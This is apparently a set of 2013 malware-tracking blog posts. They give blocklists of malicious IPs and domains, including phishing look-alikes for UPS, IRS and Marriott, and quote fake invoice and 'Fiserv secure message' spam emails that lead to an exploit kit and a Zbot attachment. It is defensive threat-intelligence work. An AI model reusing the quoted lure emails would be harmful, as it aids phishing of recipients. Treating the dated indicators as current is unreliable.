209.222.67.251
210.200.0.95
211.224.204.141
212.143.233.159
217.64.107.108
aa.com.reservation.viewfareruledetailsaccess.do.sai-uka-sai.com
abundanceguys.net
allgstat.ru
amimeseason.net
annot.pl
antidoctorpj.com
aqua-thermos.com
astarts.ru
auditbodies.net
aurakeep.net
autocompletiondel.net
autorize.net.models-and-kits.net
badstylecorps.com
basedbreakpark.su
beachfiretald.com
bebomsn.net
biati.net
blacklistsvignet.pl
blackragnarok.net
blindsay-law.net
bnamecorni.com
boats-sale.net
brasilmatics.net
buffalonyroofers.net
businessdocu.net
buty24-cool.com
buycushion.net
cbstechcorp.net
centow.ru
chairsantique.net
ciriengrozniyivdd.ru
cirormdnivneinted40.ru
clik-kids.com
condaleunvjdlp55.net
condalinarad72234652.ru
condalinaradushko5.ru
condalininneuwu36.net
condalinneuwu37.net
condalinneuwu5.ru
condalnua745746.ru
cooldeaflympics.com
cpa.state.tx.us.tax-returns.mattwaltererie.net
crossplatformcons.com
cryoroyal.net
datapadsinthi.net
doorandstoned.com
driversupdate.pw
dulethcentury.net
e-citystores.net
e-eleves.net
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihenransivuennd.net
ehnihjrkenpj.ru
ehnihujasebejav15.ru
eliroots.ru
epackage.ups.com.shanghaiherald.net
ergopets.com
erminwanbuernantion20.net
ermitirationifyouwau30.net
estateandpropertty.com
etiquetteinsp.net
fastfragcheck.com
feminineperceiv.pl
fenvid.com
filmstripstyl.com
firefoxupd.pw
firerice.com
flashedglobetrot.pl
foremostorgand.su
foremostorgand.suc
fulty.net
gamnnbienwndd70.net
gcoordinatind.com
gebelikokulu.net
generationpasswaua40.net
genie-enterprises.com
germany.no-ip.biz
ghroumingoviede.ru
gnanosnugivnehu.ru
gondamtvibnejnepl.net
goodread.pl
greenleaf-investment.net
gromovieotvodidiejj40.net
handwrittenma.com
hdmltextvoice.net
heavygear.net
heidipinks.com
hemorelief.net
hiddenhacks.com
highsecure155.com
hingpressplay.net
homesforsaleftwaltonbea.com
hotkoyou.net
hotpubblici.com
housesales.pl
iberiti.com
icensol.net
independinsy.net
info-for-health.net
insectiore.net
irs.gov.tax-refunds.ach.treehouse-dreams.net
jonkrut.ru
kistrotilewest.su
klermont.net
klwines.com.order.complete.prysmm.net
kubiwaya.net
ledfordlawoffice.net
letsgofit.net
linguaape.net
linkedin.com-update-report.taltondark.net
links.emails.bmwusa.com.open.pagebuoy.net
locavoresfood.net
mackay-revealed.net
made-bali.net
magiklovsterd.net
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
metalcrew.net
microsoftnotification.net
mifiesta.ru
modshows.net
momotlawfirm.net
morphed.ru
mosher.pl
motobrio.net
mycanoweb.com
myfreecamgirls.net
mywebsitetips.net
neplohsec.com
nipslippage.net
nvufvwieg.com
onemessage.verizonwireless.com.verizonwirelessreports.com
ontria.ru
organizerrescui.pl
outbounduk.net
oydahrenlitu346357.ru
package.ups.com.shanghaiherald.net
pagebuoy.net
pass-hc.com
peertag.com
playtimepixelating.su
pool-inter.com
porschetr-ml.com
potteryconvention.ru
privat-tor-service.com
prothericsplk.com
prysmm.net
quipbox.com
ratenames.net
relectsdispla.net
rentipod.ru
restless.su
saberig.net
safebrowse.pw
sai-uka-sai.com
sartorilaw.net
scourswarriors.su
secureaction120.com
securednshooki.com
sendkick.com
sensetegej100.com
seodirect-proxy.com
shanghaiherald.net
sludgekeychai.net
soberimages.com
susubaby.net
tagcentriccent.net
tagcentriccent.pl
tax-returns.gov.cpa.state.us.gebelikokulu.net
teakfromafrica.net
techno5room.ru
thegalaxyatwork.com
thosetemperat.net
tor-connect-secure.com
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
u-janusa.net
ukbash.ru
usergateproxy.net
verizonwirelessreports.com
viperlair.net
vip-proxy-to-tor.com
vitans.net
vivendacalangute.net
wic-office.com
wordstudio.pl
wow-included.com
zestrecommend.com

Thursday, 11 July 2013

Malware sites to block 11/7/13

I noticed 188.138.89.106 (Intergenia AG, Germany) was the originating IP being used in this spam run using a hijacked 1&1 account, and VirusTotal thinks that the server is pretty darned evil. A quick poke at this box shows that has a number of multihomed malicious and C&C domains.

Looking at some of these servers, I'm suspicious that they may have been compromised using a Plesk vulnerability. Various domains are used for botnets, including some Bitcoin miners. There may be some formerly legitimate domains in this mix, but given the compromised nature of the servers I would not trust them.

37.123.112.147 (UK2.NET, UK)
37.123.113.7 (UK2.NET, UK)
68.169.38.143 (Westhost Inc, US)
68.169.42.177 (Westhost Inc, US)
74.208.133.134 (1&1, US)
85.25.86.198 (Intergenia AG, Germany)
109.123.95.8 (UK2.NET, UK)
188.138.89.106 (Intergenia AG, Germany)
212.53.167.13 (FASTCOM IP Net, Poland)
212.227.53.20 (1&1, Germany)
212.227.252.92 (1&1, Germany)
213.165.71.238 (1&1, Germany)
217.160.173.154 (1&1, Germany)

Recommended blocklist:
37.123.112.147
37.123.113.7
68.169.38.143
68.169.42.177
74.208.133.134
85.25.86.198
109.123.95.8
188.138.89.106
212.53.167.13
212.227.53.20
212.227.252.92
213.165.71.238
217.160.173.154
bayrische-kampfplantage.de
f.eastmoon.pl
final.toles.org
final.twiaci.com
fujimoto-group.jp
gigasbh.org
gigasphere.su
jobs.4zox.com
ks-reifenservice.de
mh-wellnesscoach.de
mikimouse.net
move-aube.fr
naturalcuresdoc.com
naturalcuresdocanswers.com
newbigjob.de
p15114714.pureserver.info
s.richlab.pl
secure.redirectsite.net
soulvampire-ice.de
streetdanceroom.de
tests.gigasbh.org
toles.org
treibholzundmeer.de
try.aktivoxigen.com
wireless-work.su
xixbh.com
xixbh.net
xray868.server4you.de
xxxxxxxxxxxxxxx.kei.su

"WTX Media INC" spam / dajizzum.com

This fake invoice spam from the nonexistant "WTX Media" leads to a malware landing page on dajizzum.com:

From: Rebecca Media [mailto:support@rebeccacella.com]
Sent: 11 July 2013 07:46
To: [redacted]
Subject: Subscription Details

We hereby inform you that your subscription has been activated, your login information is as follows:

Username: IX9322130
Password: X#(@kIE04N
Login Key: 839384

Please do not share the login information with anyone as this account is only for your use, sharing the account will result in account termination without a refund.
The credit card on file submited by you will be billed within 24 hours, in the amount of 499.00 GBP, amount equal to one year unlimited subscription.
Your bank statement will show up as being billed by "WTX Media INC".

If you have any questions or issues with your login as well as requests to upgrade or cancel your membership please contact us using the form at:

[donotclick]www.rebeccacella.com/wp-content/plugins/subscribe/


Any feedback is appreciated as we strive to improve our services constantly.
WTX Media Team
The link in the email goes through a legitimate but hacked website (rebeccacella.com) and lands on a malware landing page at [donotclick]dajizzum.com/team/administration/admin4_colon/fedora.php?view=44 (report here) which contains an exploit kit.

dajizzum.com is hosted on 109.123.100.219 (UK2.NET, UK) which appears to be a hijacked server. At the moment I can only see that one site hosted on this box, but blacklisting the IP as a precaution may be wise.

The spam originates from another malware server on 188.138.89.106 (more of this later) but it appears to use a compromised 1&1 account as the spamvertised domain, sender's address and SMTP relay of 212.227.29.10 all belong to that provider.

Tuesday, 9 July 2013

Malware sites to block 9/7/13

These are the current IPs and domains that appear to be in use by this gang. IPs are listed with hosting companies and countries first, and then a plain list of IPs and domains for copy-and-pasting:
5.135.198.41 (OVH, France)
14.63.198.119 (Korea Telecom, Korea)
24.173.170.230 (Time Warner Cable, US)
46.14.182.109 (Swisscom, Switzerland)
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
54.232.86.91 (Amazon AWS, Brazil)
59.124.33.215 (Chungwa Telecom, Taiwan)
62.165.254.220 (Tvnetwork, Hungary)
62.169.58.22 (Phoenix Informatica, Italy)
64.49.246.226 (Rackspace, US)
69.162.76.10 (Limestone Networks, US)
74.63.195.131 (Limestone Networks, US)
74.93.56.83 (Comcast Communications, US)
77.240.118.69 (Acens Technlogies, Spain)
78.108.86.169 (Majordomo LLC, Russia)
80.52.135.172 (Telekomunikacja Polska, Poland)
80.218.115.92 (Cablecom, Switzerland)
82.79.4.33 (RCS & RDS Business, Romania)
82.165.41.13 (1&1 Internet, Philippines)
89.45.83.92 (Nlink SRL, Romania)
89.93.219.156 (Bouygues Telecom, France)
89.96.141.43 (IPS SRL, Italy)
89.248.161.137 (Ecatel, Netherlands)
89.248.161.146 (Ecatel, Netherlands)
95.111.32.249 (Mobitel, Bulgaria)
95.173.187.8 (Netinternet Bilgisayar Telekominukasyo, Turkey)
97.79.214.75 (Time Warner Cable, US)
103.9.23.34 (TPL Trakker Ltd, Pakistan)
109.169.86.196 (iomart / ThrustVPS, UK)
109.234.84.213 (Servicleop, Spain)
113.161.207.101 (VNPT, Vietnam)
115.28.45.30 (HiChina Web Solutions / Alibaba, China)
115.146.93.25 (Nectar Research Cloud, Australia)
116.251.213.12 (OneAsiaHost, Singapore)
117.102.102.170 (Servo Buana Resources, Indonesia)
117.239.224.145 (ZAD Institute, India)
123.30.50.245 (VNPT, Vietnam)
129.64.95.45 (Brandeis University, US)
134.159.143.12 (Telstra-Telewhite, Hong Kong)
138.80.14.27 (Charles Darwin University, Australia)
143.239.87.38 (University College Cork, Ireland)
151.155.25.111 (Novell Inc, US)
172.246.122.111 (Enzu Inc, US)
173.167.54.139 (Iceweb Storage Corp, US)
173.245.7.158 (Leland Private Systems, US)
177.87.104.21 (Alberto Torres Barreto, Brazil)
181.54.174.204 (Telmex Colombia, Colombia)
184.22.36.4 (HostNOC, US)
184.105.135.29 (Hurricane Electric, US)
186.227.53.43 (Via Cabo Provedor de Internet e Informática Ltda, Brazil)
189.84.25.188 (DataCorpore Serviços e Representações, Brazil)
190.85.249.159 (Telmex Colombia, Colombia)
190.238.107.240 (TDP ERX, Peru)
192.210.205.208 (New Wave Netconnect / Colocrossing, US)
193.242.126.78 (Lemminkainen Oyj, Finland)
195.241.208.160 (Telfort / Tiscali / KPN, Netherlands)
198.46.131.100 (New Wave Netconnect / Colocrossing, US)
198.50.136.166 (OVH, Brazil)
198.175.124.17 (DNSSLAVE.COM, US)
198.199.70.149 (Digital Ocean, US)
199.233.234.83 (Nodedeploy, US)
202.28.69.195 (UniNet, Thailand)
202.56.170.28 (Ningnet, Indonesia)
203.235.181.181 (GNGAS Enterprise Networks, Korea)
207.254.1.17 (Virtacore Systems, US)
210.200.0.95 (Asia Pacific On-line Services Inc, Taiwan)
213.56.125.97 (OBS, France)
222.20.90.25 (HuaZhong University of Science and Technology, China)

5.135.198.41
14.63.198.119
24.173.170.230
46.14.182.109
46.45.182.27
54.232.86.91
59.124.33.215
62.165.254.220
62.169.58.22
64.49.246.226
69.162.76.10
74.63.195.131
74.93.56.83
77.240.118.69
78.108.86.169
80.52.135.172
80.218.115.92
82.79.4.33
82.165.41.13
89.45.83.92
89.93.219.156
89.96.141.43
89.248.161.137
89.248.161.146
95.111.32.249
95.173.187.8
97.79.214.75
103.9.23.34
109.169.86.196
109.234.84.213
113.161.207.101
115.28.45.30
115.146.93.25
116.251.213.12
117.102.102.170
117.239.224.145
123.30.50.245
129.64.95.45
134.159.143.12
138.80.14.27
143.239.87.38
151.155.25.111
172.246.122.111
173.167.54.139
173.245.7.158
177.87.104.21
181.54.174.204
184.22.36.4
184.105.135.29
186.227.53.43
189.84.25.188
190.85.249.159
190.238.107.240
192.210.205.208
193.242.126.78
195.241.208.160
198.46.131.100
198.50.136.166
198.175.124.17
198.199.70.149
199.233.234.83
202.28.69.195
202.56.170.28
203.235.181.181
207.254.1.17
210.200.0.95
213.56.125.97
222.20.90.25
101ndstreetymha.com
afabind.com
amazon.com.first4supplies.net
americanexpress.com.krasalco.com
andertiua200.com
androv.pl
aniolyfarmacij.com
astarts.ru
auditbodies.net
beachfiretald.com
beatenunwield.com
bebomsn.net
beirutyinfo.com
blacklistsvignet.pl
bnamecorni.com
boats-sale.net
brandeddepend.com
buycushion.net
cardpalooza.su
centow.ru
centsvisualcaf.net
chairsantique.net
chrismortonlaw.net
ciriengrozniyivdd.ru
cirienkoidrugied50.ru
cirormdnivneinted40.ru
cocainism.net
collegialwar.com
com.amazon.com.first4supplies.net
condalinarad72234652.ru
condalinaradushko5.ru
condalinneuwu5.ru
condalinrwgw136.ru
condalnua745746.ru
datapadsinthi.net
delines.ru
dirvers.net
doorandstoned.com
driversupdate.pw
editionscode.com
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihjrkenpj.ru
ehnihujasebejav15.ru
enchantingfluid.com
enuhhdijsnenbude40.ru
ergopets.com
feminineperceiv.pl
filmstripstyl.com
fincal.pl
firefoxupd.pw
first4supplies.net
freakable.net
fulty.net
gamnnbienwndd70.net
gatorovnskeinbueed60.ru
genie-enterprises.com
gerlos-hotel.net
getstatsp.ru
ghroumingoviede.ru
gnanisienviwjunlp.ru
gnanosnugivnehu.ru
grivnichesvkisejj50.ru
hdmltextvoice.net
heidipinks.com
hexactos.com
hingpressplay.net
hospitalinstitutee.com
hotkoyou.net
independinsy.net
infostarter.net
initiationtune.su
insectiore.net
joinproportio.com
jonkrut.ru
letsgofit.net
lexus-lfa.net
libulionstreet.su
lifeline-tv.net
lifestylelbinfo.com
linefisher.com
liocolostrum.net
magiklovsterd.net
mail1.infostarter.net
modshows.net
mychildrenss.com
ns1.infostarter.net
nvufvwieg.com
organizerrescui.pl
oydahrenlitu346357.ru
patrihotel.net
paynotice07.net
pinterest.com.reports0701.net
porschetr-ml.com
potteryconvention.ru
privat-tor-service.com
przcloud.com
quipbox.com
recatalogfinger.net
relationshipa.com
relectsdispla.net
rentipod.ru
reports0701.net
reveck.com
salesplaytime.net
sartorilaw.net
secrettapess.com
securednshooki.com
sendkick.com
smartsecurity-app.com
soberimages.com
spros.pl
streetgreenlj.com
susubaby.net
syncbinderanalog.net
tagcentriccent.net
tagcentriccent.pl
telecomerra.com
tor-connect-secure.com
transplantee.net
tstatbox.ru
ukbash.ru
usenet4ever.net
utraining.us
vahvahchicas.ru
ventstandart.net
vip-proxy-to-tor.com
voippromotion.su
webhelphighestp.net
wic-office.com
widnows.net
winodwsupd.pw
wow-included.com
zestrecommend.com

Tuesday, 16 April 2013

"Fiserv Secure Email Notification" spam

This spam has an encrypted ZIP file attached that contains malware. The passwords and filenames will vary.


From: Fiserv Secure Notification [mailto:secure.notification@fiserv.com]
Sent: Tue 16/04/2013 14:02
Subject: [WARNING : MESSAGE ENCRYPTED] Fiserv Secure Email Notification - CC3DK9WJW8IG0F5


You have received a secure message

Read your secure message by opening the attachment, Case_CC3DK9WJW8IG0F5.zip.

The attached file contains the encrypted message that you have received.

To decrypt the message use the following password -  KsUs3Z921mA

To read the encrypted message, complete the following steps:

 -  Double-click the encrypted message file attachment to download the file to your computer.
 -  Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
 -  The message is password-protected, enter your password to open it.

To access from a mobile device, forward this message to mobile@res.fiserv.com to receive a mobile login URL.

If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.979.7673.

2000-2013 Fiserv Secure Systems, Inc. All rights reserved.

In the case of the sample I have seen, there is an attachment Case_CC3DK9WJW8IG0F5.zip which unzips using the supplied password to Case_Fiserv_04162013.exe (note the date is encoded into the filename).

At the time of writing, VirusTotal results are just 5/46. The Comodo CAMAS report is here, the ThreatExpert report here and the ThreatTrack sandbox report can be downloaded from here (this is the most detailed one). This seems to be a Zbot variant.


The bad IPs involved are:
50.116.15.209 (Linode, US)
62.103.27.242 (OTEnet, Greece)
78.139.187.6 (Caucasus Online Ltd, Georgia)
87.106.3.129 (1&1, Germany)
108.94.154.77 (AT&T, US)
117.212.83.248 (BSNL Internet, India)
120.61.212.73 (MTNL, India)
122.165.219.71 (ABTS Tamilnadu, India)
123.237.187.126 (Reliance Communications, India)
176.73.145.22 (Caucasus Online Ltd, Georgia)
186.134.148.36 (Telefonica de Argentina, Argentina)
190.39.197.150 (CANTV Servicios, Venezuela)
195.77.194.130 (Telefonica, Spain)
199.59.157.124 (Kyvon, US)
201.211.224.46 (CANTV Servicios, Venezuela)
212.58.4.13 (Doruknet, Turkey)

Recommended blocklist:
korbi.va-techniker.de
mail.yaklasim.com
phdsurvey.org
vbzmiami.com
user1557864.sites.myregisteredsite.com
50.116.15.209
62.103.27.242
78.139.187.6
87.106.3.129
108.94.154.77
117.212.83.248
120.61.212.73
122.165.219.71
123.237.187.126
176.73.145.22
186.134.148.36
190.39.197.150
195.77.194.130
199.59.157.124
201.211.224.46
212.58.4.13